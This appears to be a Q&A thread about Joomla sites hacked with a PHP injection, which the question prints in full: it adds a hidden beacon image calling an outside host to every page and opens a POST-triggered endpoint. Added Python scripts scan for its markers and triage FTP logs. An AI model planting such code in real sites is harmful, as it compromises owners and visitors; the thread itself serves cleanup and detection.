2

Possible Duplicate:
My server's been hacked EMERGENCY

All Joomla! sites hosted on a single server of mine were hacked and had the following code injected into the index.php files throughout many directories.

    <?php
    //{{126104ed
    
    GLOBAL $alreadyxxx;
    if($alreadyxxx != 1)
    {
    $alreadyxxx = 1;
    
    $olderrxxx=error_reporting(0);
    
    function outputxxx_callback($str)
    {
      $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>';
      preg_match("|</body>|si",$str,$arr);
      return str_replace($arr[0],$links.$arr[0],$str);
    }
    
    function StrToNum($Str, $Check, $Magic)
    {
       $Int32Unit = 4294967296;
       $length = strlen($Str);
       for ($i = 0; $i < $length; $i++) {
           $Check *= $Magic;
           if ($Check >= $Int32Unit) {
               $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
               $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
           }
           $Check += ord($Str{$i});
       }
       return $Check;
    }
    function HashURL($String)
    {
       $Check1 = StrToNum($String, 0x1505, 0x21);
       $Check2 = StrToNum($String, 0, 0x1003F);
    
       $Check1 >>= 2;
       $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
       $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
       $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
    
       $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
       $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
    
       return ($T1 | $T2);
    }
    
    function CheckHash($Hashnum)
    {
       $CheckByte = 0;
       $Flag = 0;
    
       $HashStr = sprintf('%u', $Hashnum) ;
       $length = strlen($HashStr);
    
       for ($i = $length-1; $i >= 0;  $i--) {
           $Re = $HashStr{$i};
           if (1 === ($Flag % 2)) {
               $Re += $Re;
               $Re = (int)($Re / 10) + ($Re % 10);
           }
           $CheckByte += $Re;
           $Flag ++;
       }
    
       $CheckByte %= 10;
       if (0 !== $CheckByte) {
           $CheckByte = 10 - $CheckByte;
           if (1 === ($Flag % 2) ) {
               if (1 === ($CheckByte % 2)) {
                   $CheckByte += 9;
               }
               $CheckByte >>= 1;
           }
       }
    
       return '7'.$CheckByte.$HashStr;
    }
    
    function getpr($url)
    {
       $ch = CheckHash(HashURL($url));
       $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
       $data = file_get_contents($file);
       $pos = strpos($data, "Rank_");
       if($pos === false){return -1;} else{
           $pr=substr($data, $pos + 9);
           $pr=trim($pr);
           $pr=str_replace("
    ",'',$pr);
           return $pr;
       }
    }
    
    if(isset($_POST['xxxprch']))
    {
        echo getpr($_POST['xxxprch']);
        exit();
    }
    else
      ob_start('outputxxx_callback');
    
    error_reporting($olderrxxx);
    }
    
    //}}861921ab

As far as I was aware, and according to all the documentation, my Joomla! sites were secure. However, all of them on the same server were hacked at the same time. Is it the host's fault?

Anyone know where I should begin cleaning this mess up? Any quick solutions apart from my site backups?

And the biggest question I have is what would be the best way to trace the hacker to his/her site, server or location? I really want to show them my appreciation of their work in return.
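Added example (not from the question or any answer): a small scanner for the pattern visible in the posted code. The injection sits between paired `//{{<8 hex digits>` and `//}}<8 hex digits>` comment markers and carries a few strings that never appear in a clean Joomla install (`outputxxx_callback`, `$alreadyxxx`, `xxxprch`, the `airschk.com` beacon host). The script walks a web root, reports every PHP file carrying those indicators together with the beacon URL it phones home to, and can cut the marker-delimited block out for triage. The sample files it scans are constructed here; the `id=0000` in the beacon URL is a placeholder, not the value from the post.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import Optional

# Constructed sample of an infected index.php. The marker comments and the
# identifiers are taken from the injected code in the question; the beacon id
# is a placeholder and the tail stands in for the legitimate Joomla bootstrap.
INFECTED_SAMPLE = """<?php
//{{126104ed

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
function outputxxx_callback($str)
{
  $links = '<img width=0 height=0 src="http://airschk.com/countbk.gif?id=0000">';
  return str_replace('</body>', $links.'</body>', $str);
}
if(isset($_POST['xxxprch'])) { echo 'x'; exit(); }
else
  ob_start('outputxxx_callback');
}

//}}861921ab
define('_JEXEC', 1);
require_once 'includes/framework.php';
"""

# Constructed clean counterpart: what the file should look like.
CLEAN_SAMPLE = """<?php
define('_JEXEC', 1);
require_once 'includes/framework.php';
"""

# The injected block is delimited by //{{<8 hex> ... //}}<8 hex> comment markers.
BLOCK_RE = re.compile(r"//\{\{[0-9a-f]{8}\s.*?//\}\}[0-9a-f]{8}[ \t]*\n?", re.S)

# Strings from the injected code that do not occur in a clean install.
INDICATORS = ("outputxxx_callback", "$alreadyxxx", "xxxprch", "airschk.com")


def find_injection(src: str) -> Optional[dict]:
    """Return the marker block span, indicator hits and beacon URL, or None if clean."""
    m = BLOCK_RE.search(src)
    hits = [s for s in INDICATORS if s in src]
    if m is None and not hits:
        return None
    beacon = re.search(r"https?://[^\s'\"<>]+", m.group(0)) if m else None
    return {
        "block_span": m.span() if m else None,
        "indicators": hits,
        "beacon_url": beacon.group(0) if beacon else None,
    }


def strip_injection(src: str) -> str:
    """Remove the first marker-delimited block. Useful for triage and diffing;
    it does not replace restoring the site from a known-good backup."""
    return BLOCK_RE.sub("", src, count=1)


def scan_tree(root, pattern: str = "*.php") -> dict:
    """Walk root recursively and report every PHP file carrying the injection."""
    findings = {}
    for path in Path(root).rglob(pattern):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        result = find_injection(text)
        if result:
            findings[str(path)] = result
    return findings


def demo_scan() -> list:
    """Build a throwaway tree (two infected files, one clean) and return the
    infected paths relative to the tree root."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "site1/index.php": INFECTED_SAMPLE,
            "site1/administrator/index.php": INFECTED_SAMPLE,
            "site2/index.php": CLEAN_SAMPLE,
        }
        for rel, body in samples.items():
            p = Path(root, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body, encoding="utf-8")
        return sorted(os.path.relpath(f, root) for f in scan_tree(root))


if __name__ == "__main__":
    import sys
    # Usage: python scan_injection.py /var/www
    for f, r in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f, r["indicators"], r["beacon_url"])
```

Run it read-only first (`python scan_injection.py /var/www`) to get the list of touched files and the beacon host to block at the egress filter; the scan only matches this specific injection, so a clean result does not mean the server is clean, which is why the answers below lean on restoring from backup.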

5 Answers

4

"As far I was aware and according to all documentation, my Joomla! sites were secure."

That statement is your first problem. If you google for "joomla hacked" there are 280,000 results just in the past month alone...

As far as recovery, I wouldn't trust anything shy of restoring from a known good backup. Those edits are just the ones you found. Who knows what else might have been put in there.

For tracking them down, you might want to start by reading this: http://kb.siteground.com/article/Joomla_hacked.html

In a nutshell I'd say your chances are close to nil. However, they go up a few percentage points if you happen to have deep pockets or government backing.

ChrisLively
  • 3,782
2

My guess is that they got the password for your server with a Trojan. Check your computer ASAP, especially if you store the server passwords in any program (browser, FTP clients, Total Commander, etc.). BTW: I'm assuming you're using Windows.

About tracing the hacker, it's not going to be easy. First check the access logs from the time this happened. You'll probably see tons of FTP activity there. Have a look at the IPs in those logs. If all of them are different, then he's probably using zombie computers and it's very unlikely that you'll get to him. If they're all the same, then you might be a little more lucky.

Anyway, this sounds like an automated attack. Do a search to check if other sites (not in your server) had the same code injected to them.
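Added example, not part of this answer: the log check the answer describes, run over constructed FTP transfer-log lines. It assumes the server writes a wu-ftpd/vsftpd-style xferlog (date, transfer time, remote host, size, path, type, action flag, direction, access mode, user, ...), keeps only incoming transfers (`i`) of files named `index.php`, and groups them by source address and account. One address behind all uploads points to a single attacker host; many addresses point to the zombie/proxy scenario the answer mentions. The addresses, users and paths are invented.

```python
from collections import Counter, defaultdict

# Constructed xferlog-style lines (wu-ftpd/vsftpd transfer log format).
# Hosts are documentation addresses; accounts and paths are invented.
SAMPLE_XFERLOG = """\
Mon Apr 18 02:58:11 2011 0 203.0.113.5 812 /var/www/site1/images/logo.png b _ o r site1ftp ftp 0 * c
Mon Apr 18 03:12:07 2011 1 203.0.113.5 4231 /var/www/site1/index.php a _ i r site1ftp ftp 0 * c
Mon Apr 18 03:12:09 2011 1 203.0.113.5 4180 /var/www/site1/administrator/index.php a _ i r site1ftp ftp 0 * c
Mon Apr 18 03:13:40 2011 1 198.51.100.23 4102 /var/www/site2/index.php a _ i r site2ftp ftp 0 * c
Mon Apr 18 03:13:41 2011 1 198.51.100.77 4099 /var/www/site3/index.php a _ i r site3ftp ftp 0 * c
Mon Apr 18 09:30:02 2011 2 203.0.113.5 9911 /var/www/site1/templates/x/index.php a _ i r site1ftp ftp 0 * c
"""


def parse_xferlog(text: str) -> list:
    """Split xferlog lines into the fields needed for triage.
    Field layout: 0-4 timestamp, 5 transfer secs, 6 remote host, 7 bytes,
    8 path, 9 type, 10 special action, 11 direction (i=upload, o=download),
    12 access mode, 13 username."""
    records = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 14:
            continue  # truncated or unrelated line
        records.append({
            "time": " ".join(f[0:5]),
            "host": f[6],
            "size": int(f[7]),
            "path": f[8],
            "direction": f[11],
            "user": f[13],
        })
    return records


def suspicious_uploads(records: list, name: str = "index.php") -> list:
    """Incoming transfers that overwrote a file with the given name."""
    return [r for r in records
            if r["direction"] == "i" and r["path"].endswith("/" + name)]


def triage(text: str) -> dict:
    """Group suspicious uploads by source address and account and say whether
    the activity came from one host or from many."""
    ups = suspicious_uploads(parse_xferlog(text))
    by_ip = Counter(r["host"] for r in ups)
    hosts_per_user = defaultdict(set)
    for r in ups:
        hosts_per_user[r["user"]].add(r["host"])
    if not by_ip:
        verdict = "no suspicious uploads"
    elif len(by_ip) == 1:
        verdict = "single source"
    else:
        verdict = "multiple sources (zombies or proxies likely)"
    return {
        "uploads": len(ups),
        "by_ip": dict(by_ip),
        "distinct_ips": len(by_ip),
        "accounts": sorted(hosts_per_user),
        "first": ups[0]["time"] if ups else None,
        "last": ups[-1]["time"] if ups else None,
        "verdict": verdict,
    }


if __name__ == "__main__":
    import sys
    # Usage: python ftp_triage.py /var/log/xferlog  (no argument: built-in sample)
    log = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XFERLOG
    for k, v in triage(log).items():
        print(f"{k}: {v}")
```

On the sample the uploads land within two minutes across three accounts from three addresses, which is the automated, credential-reuse pattern rather than one person working by hand. Whatever the verdict, the account list is the set of FTP passwords that must be rotated.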

1

You don't give us enough details to be able to help with the how. It was almost certainly an automated attack, and trying to track it down will just waste your time.

There is no quick way to recover from this. Nuke from orbit and restore from a known good backup is the only way to go.

user9517
  • 117,122
0

Make sure you keep Joomla up to date! Keep on top of security updates and get them installed on all sites the day they are released.

Alex
  • 438
0

There is some explanation about it here:

http://sucuri.net/malware/malware-entry-mwbackdoor23

Which seems to be a backdoor and the img src is just used to notify the attackers that the backdoor is there...